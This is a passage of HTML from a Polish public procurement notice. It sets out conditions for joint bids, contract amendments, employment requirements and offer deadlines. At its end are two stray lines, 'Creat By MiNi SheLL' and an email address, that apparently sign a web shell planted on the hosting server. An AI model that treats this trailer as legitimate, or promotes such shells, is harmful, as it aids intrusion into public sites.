niego zasobów podmiotu<br/>udostępniającego te zasoby przy wykonywaniu zamówienia,<br/>3) czy i w jakim zakresie podmiot udostępniający, na zdolnościach którego wykonawca polega w odniesieniu do warunków<br/>udziału w postępowaniu dotyczących wykształcenia, kwalifikacji<br/>zawodowych lub doświadczenia, zrealizuje usługi, których wskazane<br/>zdolności dotyczą. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> wspólnie muszą wykazać, że wspólnie spełniają warunki udziału w postępowaniu,<br/>2) w stosunku do żadnego z nich nie zachodzi jakakolwiek podstawa do wykluczenia<br/>z postępowania na podstawie art. 108 ust. 1 oraz art. 109 ust. 1 pkt. 4 ustawy Pzp,<br/>3) ponoszą solidarną odpowiedzialność za niewykonanie lub nienależyte wykonanie<br/>3) muszą ustanowić pełnomocnika wykonawców występujących wspólnie do reprezentowania ich w postępowaniu o<br/>udzielenie zamówienia publicznego albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia.<br/>Pełnomocnictwo musi mieć formę pisemną lub kopię potwierdzona przez notariusza,<br/>4) przed zawarciem umowy o niniejsze zamówienie publiczne, jeżeli oferta konsorcjum zostanie wybrana jako<br/>najkorzystniejsza, Zamawiający wezwie do przedstawienia umowy regulującej współpracę tych wykonawców,<br/>5) wykonawcy wspólnie ubiegający się o udzielenie zamówienia mają obowiązek dołączyć do oferty oświadczenie, z którego<br/>będzie wynikać, jakie usługi wykonają poszczególni wykonawcy,<br/>6) przepisy dotyczące wykonawcy stosuje się odpowiednio do wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmian umowy oraz warunki ich wprowadzania zawarto w załączniku Nr 4 do SWZ pn. Projekt umowy <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-12-05 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/gaworzyce</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-12-05 11:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-01-03</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com